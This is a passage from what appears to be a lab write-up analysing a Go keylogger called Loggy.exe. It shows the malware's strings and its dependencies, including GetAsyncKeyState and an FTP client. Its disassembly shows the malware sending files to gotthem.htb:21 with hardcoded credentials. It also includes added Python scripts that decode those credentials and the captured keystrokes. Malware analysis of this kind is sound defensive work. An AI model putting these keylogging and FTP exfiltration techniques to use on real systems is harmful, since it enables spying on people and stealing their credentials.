github.com/lxn/win.setCursor
github.com/lxn/win.setCursorPos
github.com/lxn/win.setFocus
github.com/lxn/win.setForegroundWindow
github.com/lxn/win.setMenu
github.com/lxn/win.setMenuDefaultItem
github.com/lxn/win.setMenuInfo
github.com/lxn/win.setMenuItemBitmaps
github.com/lxn/win.setMenuItemInfo
github.com/lxn/win.setParent
github.com/lxn/win.setRect
github.com/lxn/win.setScrollInfo
github.com/lxn/win.setTimer
github.com/lxn/win.setWinEventHook
github.com/lxn/win.setWindowLong
github.com/lxn/win.setWindowLongPtr
github.com/lxn/win.setWindowPlacement
github.com/lxn/win.setWindowPos
github.com/lxn/win.showWindow
github.com/lxn/win.systemParametersInfo
github.com/lxn/win.trackMouseEvent
github.com/lxn/win.trackPopupMenu
github.com/lxn/win.trackPopupMenuEx
github.com/lxn/win.translateMessage
github.com/lxn/win.unhookWinEvent
github.com/lxn/win.updateWindow
github.com/lxn/win.windowFromDC
github.com/lxn/win.windowFromPoint
github.com/lxn/win.libuxtheme
github.com/lxn/win.closeThemeData
github.com/lxn/win.drawThemeBackground
github.com/lxn/win.drawThemeTextEx
github.com/lxn/win.getThemeColor
github.com/lxn/win.getThemePartSize
github.com/lxn/win.getThemeTextExtent
github.com/lxn/win.isAppThemed
github.com/lxn/win.openThemeData
github.com/lxn/win.setWindowTheme
github.com/lxn/win.libwinspool
github.com/lxn/win.deviceCapabilities
github.com/lxn/win.documentProperties
github.com/lxn/win.enumPrinters
github.com/lxn/win.getDefaultPrinter
go:itab.*github.com/hashicorp/go-multierror.Error,error
go:itab.*github.com/jlaffaye/ftp.debugWrapper,io.ReadWriteCloser
go:itab.github.com/hashicorp/go-multierror.chain,error

So the answer is github.com/jlaffaye/ftp. It is an FTP client library, and the symbols linked in from it include (*ServerConn).Login, (*ServerConn).Stor and (*ServerConn).StorFrom, i.e. the upload path, which is exactly what an exfiltration channel needs. None of the other dependencies moves data off the host: kbinani/screenshot captures the screen, lxn/win and TheTitanrain/w32 are Win32 bindings (the latter pulling in GetAsyncKeyState, a classic keylogging primitive), and hashicorp/go-multierror is error handling.

Task 4

What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots?

  • github.com/kbinani/screenshot
  • This repository is a cross-platform Go package for capturing screenshots; the Windows implementation (screenshot_windows.go) is what got linked into this binary.
  • The following references in Loggy.exe confirm its presence:
    • github.com/kbinani/screenshot.Capture
    • github.com/kbinani/screenshot.CaptureRect
    • github.com/kbinani/screenshot.GetDisplayBounds
    • github.com/kbinani/screenshot.enumDisplayMonitors

Task 5

Which function call suggests that the malware produces a file after execution?

  • I just filtered the strings for the words "write" and "file":
 
┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep -i "writefile"
 
, size = bad prune, tail = recover:  not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=rwxrwxrwxFindCloseLocalFreeMoveFileWWriteFileWSASendTotlsrsakex%s %x %x
syscall.WriteFile
syscall.writeFile
WriteFile
syscall.writeFile
syscall.procWriteFile

Task 6

You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to?

  • So I filtered out port number 21, as the FTP port is port 21:
┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep  ":21"
	sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc  called from dalTLDpSugct?GetTempPath2Wlevel 3 resetsrmount errortimer expiredexchange fullCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueWtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMlame referralCreateRectRgnCreateActCtxWCoTaskMemFreeOleInitializePdhCloseQueryAnimateWindowDrawFocusRectGetMenuItemIDGetScrollInfoGetSystemMenuSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWgocacheverifyinstallgoroothtml/templateinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressname too longDeleteServiceGetDriveTypeWThread32FirstRtlGetVersionRtlInitStringExitWindowsExWTSFreeMemoryempty integerunsupported:  in host namegotthem.htb:21not a PNG fileComputerNameEx: extra text: ControlServiceOpenSCManagerWRegSetValueExWCreateProcessWDwmEnableMMCSSDwmShowContactGetStockObjectGetPixelFormatSetPixelFormatGdiplusStartupSizeofResourceModule32FirstWGetSystemTimesVirtualAllocExCoInitializeExCoUninitializeSysAllocStringwglMakeCurrentDragQueryFileWDragQueryPointDefWindowProcWSetWindowTextWGetWindowTextWScreenToClientSetWindowLongWGetWindowLongWInvalidateRectReleaseCaptureClientToScreenCloseClipboardEmptyClipboardCallNextHookExinvalid syntax1907348632812595367431640625unexpected EOFunsafe.Pointer on zero Valueunknown methoduserArenaStateread mem statsallocfreetracegcstoptheworldGC assist waitfinalizer waitsync.Cond.Waits.allocCount= nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod

Task 7

What are the threat actor’s credentials?

  • In the function “main.sendFilesViaFTP”, we observe that the attacker’s credentials have been recorded.
005f3a40  4c8da424f0feffff   lea     r12, [rsp-0x110 {var_110}]
005f3a48  4d3b6610           cmp     r12 {var_110}, qword [r14+0x10]
005f3a4c  0f86ea070000       jbe     0x5f423c
 
005f3a52  55                 push    rbp {__saved_rbp}
005f3a53  4889e5             mov     rbp, rsp {__saved_rbp}
005f3a56  4881ec88010000     sub     rsp, 0x188
005f3a5d  488d05ebe10500     lea     rax, [rel data_651ba6[0xa9]]  {"gotthem.htb:21not a PNG fileComp…"}
005f3a64  bb0e000000         mov     ebx, 0xe
005f3a69  31c9               xor     ecx, ecx  {0x0}
005f3a6b  31ff               xor     edi, edi  {0x0}
005f3a6d  4889fe             mov     rsi, rdi  {0x0}
005f3a70  e86bcbfeff         call    github.com/jlaffaye/ftp.Dial
005f3a75  4885db             test    rbx, rbx  {0xe}
005f3a78  0f84b5000000       je      0x5f3b33  {0x0}
 
005f3a7e  440f11bc24300100…  movups  xmmword [rsp+0x130 {var_60}], xmm15
005f3a87  7404               je      0x5f3a8d  {0x0}
 
005f3a89  488b5b08           mov     rbx, qword [rbx+0x8]  {0x16}
 
005f3a8d  48899c2430010000   mov     qword [rsp+0x130 {var_60}], rbx
005f3a95  48898c2438010000   mov     qword [rsp+0x138 {var_60+0x8}], rcx
005f3a9d  440f11bc24400100…  movups  xmmword [rsp+0x140 {var_50}], xmm15
005f3aa6  440f11bc24500100…  movups  xmmword [rsp+0x150 {var_40_1}], xmm15
005f3aaf  440f11bc24600100…  movups  xmmword [rsp+0x160 {var_30_1}], xmm15
005f3ab8  488d15010b0000     lea     rdx, [rel main.sendFilesViaFTP.Printf.func1]
005f3abf  4889942440010000   mov     qword [rsp+0x140 {var_50}], rdx  {main.sendFilesViaFTP.Printf.func1}
005f3ac7  48c7842450010000…  mov     qword [rsp+0x150 {var_40_1}], 0x23
005f3ad3  488d151f860600     lea     rdx, [rel data_65c093[0x66]]  {"Failed to connect to FTP server:…"}
005f3ada  4889942448010000   mov     qword [rsp+0x148 {var_50+0x8}], rdx  {data_65c093[0x66], "Failed to connect to FTP server:…"}
005f3ae2  48c7842460010000…  mov     qword [rsp+0x160 {var_30_1}], 0x1
005f3aee  48c7842468010000…  mov     qword [rsp+0x168 {var_30_1+0x8}], 0x1
005f3afa  488d942430010000   lea     rdx, [rsp+0x130 {var_60}]
005f3b02  4889942458010000   mov     qword [rsp+0x158 {var_40_1+0x8}], rdx {var_60}
005f3b0a  488b0517302200     mov     rax, qword [rel log.std]
005f3b11  31db               xor     ebx, ebx  {0x0}
005f3b13  b902000000         mov     ecx, 0x2
005f3b18  488dbc2440010000   lea     rdi, [rsp+0x140 {var_50}]
005f3b20  e8bbd7eeff         call    log.(*Logger).output
005f3b25  e85646e4ff         call    runtime.deferreturn
005f3b2a  4881c488010000     add     rsp, 0x188
005f3b31  5d                 pop     rbp {__saved_rbp}
005f3b32  c3                 retn     {__return_addr}
 
005f3b33  48898424b8000000   mov     qword [rsp+0xb8 {var_d8}], rax
005f3b3b  440f11bc24200100…  movups  xmmword [rsp+0x120 {var_70}], xmm15
005f3b44  488d0d150a0000     lea     rcx, [rel main.sendFilesViaFTP.deferwrap1]
005f3b4b  48898c2420010000   mov     qword [rsp+0x120 {var_70}], rcx  {main.sendFilesViaFTP.deferwrap1}
005f3b53  4889842428010000   mov     qword [rsp+0x128 {var_70+0x8}], rax
005f3b5b  488d8c2420010000   lea     rcx, [rsp+0x120 {var_70}]
005f3b63  48898c2488000000   mov     qword [rsp+0x88 {var_108}], rcx {var_70}
005f3b6b  488d442470         lea     rax, [rsp+0x70 {var_120}]
005f3b70  e88b40e4ff         call    runtime.deferprocStack
005f3b75  85c0               test    eax, eax
005f3b77  0f85d5030000       jne     0x5f3f52  {0x0}
 
005f3b7d  488b8424b8000000   mov     rax, qword [rsp+0xb8 {var_d8}]
005f3b85  488d1d9ccc0500     lea     rbx, [rel data_6507c3[0x65]]  {"NottaHacker/dev/stdout/dev/stder…"}
005f3b8c  b90b000000         mov     ecx, 0xb
005f3b91  488d3d7ff80500     lea     rdi, [rel data_6533c6[0x51]]  {"Cle@rtextP@ssword0123456789ABCDE…"}
005f3b98  be11000000         mov     esi, 0x11
005f3b9d  0f1f00             nop     dword [rax]
005f3ba0  e83bd8feff         call    github.com/jlaffaye/ftp.(*ServerConn).Login
005f3ba5  4885c0             test    rax, rax
005f3ba8  0f84b5000000       je      0x5f3c63
 
005f3bae  440f11bc24100100…  movups  xmmword [rsp+0x110 {var_80}], xmm15
005f3bb7  7404               je      0x5f3bbd
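How the credentials fall out of that listing, as an added example (my own script, not part of the writeup): on amd64 Go's ABIInternal passes integer arguments in RAX, RBX, RCX, RDI, RSI, R8 to R11, and a string takes two consecutive slots, pointer then length, so the string preview the disassembler prints on each lea is merged rodata and the immediate loaded into the next register says where that argument ends. The script assumes a standard Go ABIInternal build and the listing format shown above; the rows it parses are copied from that listing.

```python
import re

# Go ABIInternal integer argument registers on amd64, in order. A Go string
# argument occupies two consecutive slots: (data pointer, length).
GO_ARG_REGS = ["rax", "rbx", "rcx", "rdi", "rsi", "r8", "r9", "r10", "r11"]
# A 32-bit write zero-extends into the full register (mov ecx, 0xb sets rcx).
ALIASES = {"eax": "rax", "ebx": "rbx", "ecx": "rcx", "edi": "rdi", "esi": "rsi",
           "r8d": "r8", "r9d": "r9", "r10d": "r10", "r11d": "r11"}

# The disassembler appends a string preview to a lea of a data pointer and cuts
# it off with "…"; the preview runs on into whatever rodata follows the string.
LEA_STR = re.compile(r'^lea\s+(\w+),\s*\[rel .*?\]\s*\{"(.*?)(…?)"\}')
MOV_IMM = re.compile(r'^mov\s+(\w+),\s*(0x[0-9a-fA-F]+|\d+)\s*(\{.*\})?$')
MOV_REG = re.compile(r'^mov\s+(\w+),\s*(\w+)\s*(\{.*\})?$')
XOR_REG = re.compile(r'^xor\s+(\w+),\s*(\w+)')
CALL = re.compile(r'^call\s+(\S+)')
DEST = re.compile(r'^(\w+)\s+(\w+),')
NON_WRITING = {"test", "cmp"}  # compare instructions only read their operands

# Rows copied from the writeup's listing of main.sendFilesViaFTP (Dial and Login).
DISASM = """\
005f3a5d  488d05ebe10500     lea     rax, [rel data_651ba6[0xa9]]  {"gotthem.htb:21not a PNG fileComp…"}
005f3a64  bb0e000000         mov     ebx, 0xe
005f3a69  31c9               xor     ecx, ecx  {0x0}
005f3a6b  31ff               xor     edi, edi  {0x0}
005f3a6d  4889fe             mov     rsi, rdi  {0x0}
005f3a70  e86bcbfeff         call    github.com/jlaffaye/ftp.Dial
005f3b7d  488b8424b8000000   mov     rax, qword [rsp+0xb8 {var_d8}]
005f3b85  488d1d9ccc0500     lea     rbx, [rel data_6507c3[0x65]]  {"NottaHacker/dev/stdout/dev/stder…"}
005f3b8c  b90b000000         mov     ecx, 0xb
005f3b91  488d3d7ff80500     lea     rdi, [rel data_6533c6[0x51]]  {"Cle@rtextP@ssword0123456789ABCDE…"}
005f3b98  be11000000         mov     esi, 0x11
005f3b9d  0f1f00             nop     dword [rax]
005f3ba0  e83bd8feff         call    github.com/jlaffaye/ftp.(*ServerConn).Login
"""


def canon(reg):
    return ALIASES.get(reg, reg)


def go_string_args(regs):
    """Pair (pointer, length) slots in argument-register order into Go strings."""
    out, i = [], 0
    while i + 1 < len(GO_ARG_REGS):
        ptr, ln = regs.get(GO_ARG_REGS[i]), regs.get(GO_ARG_REGS[i + 1])
        if ptr and ptr[0] == "str" and ln and ln[0] == "imm":
            preview, n = ptr[1], ln[1]
            # The length slot says where this string ends inside the merged preview;
            # if the disassembler cut the preview short, flag that instead of guessing.
            out.append(preview[:n] if n <= len(preview) else preview + "…")
            i += 2
        else:
            i += 1
    return out


def trace_calls(disasm):
    """Track constant register values through the listing and, at each call,
    return (callee, decoded string arguments)."""
    regs, calls = {}, []
    for row in disasm.splitlines():
        parts = row.split(None, 2)
        if len(parts) < 3 or not re.fullmatch(r"[0-9a-f]+", parts[0]):
            continue  # separator or not an "address  bytes  instruction" row
        ins = parts[2].strip()
        if m := LEA_STR.match(ins):
            regs[canon(m[1])] = ("str", m[2], bool(m[3]))
        elif m := MOV_IMM.match(ins):
            regs[canon(m[1])] = ("imm", int(m[2], 0))
        elif m := MOV_REG.match(ins):
            regs[canon(m[1])] = regs.get(canon(m[2]))
        elif m := XOR_REG.match(ins):
            regs[canon(m[1])] = ("imm", 0) if canon(m[1]) == canon(m[2]) else None
        elif m := CALL.match(ins):
            calls.append((m[1], go_string_args(regs)))
            regs = {}  # Go's ABI treats every register as caller-saved
        elif (m := DEST.match(ins)) and m[1] not in NON_WRITING:
            regs[canon(m[2])] = None  # written by something this tracer does not model
    return calls


if __name__ == "__main__":
    for callee, args in trace_calls(DISASM):
        print(callee, args)
```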
 

Task 8

What file keeps getting written to disk?

  • Keylog.txt

Task 9

When Janice changed her password, this was captured in a file. What is Janice’s username and password?

[KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] U U U U S S S E E E E E R R R R N N N N A A A A A M M M M M E E E [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] 
[KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] J A A A A [BACKSPACE] [BACKSPACE] [BACKSPACE] [KEYCODE 220] 
[BACKSPACE] [KEYCODE 220] [BACKSPACE] [KEYCODE 220] [BACKSPACE] J J J J J [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] J J J A A A A N N N I I I C C C C E E E [ENTER] [ENTER] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] A A A A A A A A S A S A S A S S S S S S S S W W W W W O O O O O R R R R D D D D [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] [KEYCODE 160] A A A A A A A S A S S S S S S S S S W W W W W O O R R R D D D D D 1 1 1 1 2 2 2 2 2 2 2 2 3 3 3 3 3 [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 
162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] P P P P A A A A A A S S S S S S S S W W W O O O O O R R R D D D [KEYCODE 190] [KEYCODE 190] [KEYCODE 190] T T T T T X X X X X T T T T [ENTER] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] C 

By analysing Keylog.txt we can see that username = janice and password = password123.
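A decoder for this log format, added here as an example that is not part of the writeup: it assumes, from the ordering visible in the log ([SHIFT] J [KEYCODE 160] is VK 16, 74, 160), that the logger sweeps virtual-key codes in ascending order on every tick and writes every key that is down, so a key seen in consecutive sweeps is one press and the "A S A S" interleaving is two overlapping holds. The cost is that a genuine double letter collapses to one, which the analyst has to restore by eye; the VK numbers are the documented Windows VK_* constants, the glyphs assume a US layout, and the two samples are shortened excerpts of the log above.

```python
import re

# Tokens the logger spells out by name, mapped to Windows virtual-key codes.
NAMED = {"[BACKSPACE]": 8, "[ENTER]": 13, "[SHIFT]": 16, "[CTRL]": 17, "[SPACE]": 32}
# Raw [KEYCODE n] values seen in the log, as the documented VK_* constants:
# 1 VK_LBUTTON, 160 VK_LSHIFT, 162 VK_LCONTROL, 186 VK_OEM_1, 190 VK_OEM_PERIOD,
# 220 VK_OEM_5. Glyphs assume a US layout: (unshifted, shifted).
GLYPHS = {32: (" ", " "), 186: (";", ":"), 190: (".", ">"), 220: ("\\", "|")}
MODIFIERS = {16, 17, 160, 162}
IGNORED = {1}  # mouse clicks carry no text
TOKEN = re.compile(r"\[[^\]]*\]|\S")


def vk_of(tok):
    """Map one log token to its virtual-key code."""
    if tok in NAMED:
        return NAMED[tok]
    if m := re.fullmatch(r"\[KEYCODE (\d+)\]", tok):
        return int(m[1])
    if len(tok) == 1 and tok.isalnum():
        return ord(tok.upper())  # VK_A..VK_Z and VK_0..VK_9 equal their ASCII codes
    raise ValueError(f"unrecognised token {tok!r}")


def sweeps(text):
    """Split the token stream into per-tick sweeps. Assumption: the logger walks
    VK codes in ascending order on each tick, so a code that is not greater
    than the previous one starts a new sweep."""
    out, cur = [], []
    for tok in TOKEN.findall(text):
        vk = vk_of(tok)
        if cur and vk <= cur[-1]:
            out.append(cur)
            cur = []
        cur.append(vk)
    if cur:
        out.append(cur)
    return out


def glyph(vk, shifted):
    if 65 <= vk <= 90:
        return chr(vk) if shifted else chr(vk + 32)
    if 48 <= vk <= 57:
        return chr(vk)  # shifted digits (!@#...) are not modelled
    return GLYPHS.get(vk, ("", ""))[1 if shifted else 0]


def decode_keylog(text):
    """Rebuild what was typed. A key present in consecutive sweeps counts as one
    press, so a real double letter collapses to one. Backspace is the exception
    and is applied once per sweep, since the log shows held runs of it deleting
    several characters."""
    buf, prev = [], set()
    for sweep in sweeps(text):
        keys = set(sweep)
        shifted = bool(keys & {16, 160})
        ctrl = bool(keys & {17, 162})
        for vk in sweep:
            if vk in MODIFIERS or vk in IGNORED:
                continue
            if vk == 8:
                if buf:
                    buf.pop()
            elif vk in prev:
                continue  # still held from the previous sweep
            elif vk == 13:
                buf.append("\n")
            elif ctrl and 65 <= vk <= 90:
                buf.append(f"<Ctrl+{chr(vk)}>")
            else:
                buf.append(glyph(vk, shifted))
        prev = keys
    return "".join(buf)


# Shortened excerpts of the writeup's log: the username being retyped, and a
# file name typed near the end (note the collapsed double letter in the result).
USERNAME_SAMPLE = (
    "[SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] J A A A A "
    "[BACKSPACE] [BACKSPACE] [BACKSPACE] [KEYCODE 220] [BACKSPACE] [KEYCODE 220] "
    "[BACKSPACE] [KEYCODE 220] [BACKSPACE] J J J J J [BACKSPACE] [BACKSPACE] [BACKSPACE] "
    "[BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] J J J A A A A N N N "
    "I I I C C C C E E E [ENTER] [ENTER]"
)
FILENAME_SAMPLE = (
    "[KEYCODE 1] [KEYCODE 1] P P P P A A A A A A S S S S S S S S W W W O O O O O R R R "
    "D D D [KEYCODE 190] [KEYCODE 190] [KEYCODE 190] T T T T T X X X X X T T T T [ENTER]"
)

if __name__ == "__main__":
    print(repr(decode_keylog(USERNAME_SAMPLE)))
    print(repr(decode_keylog(FILENAME_SAMPLE)))
```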

Task 10

What app did Janice have open the last time she ran the “screenshot app”?

  • Solitaire
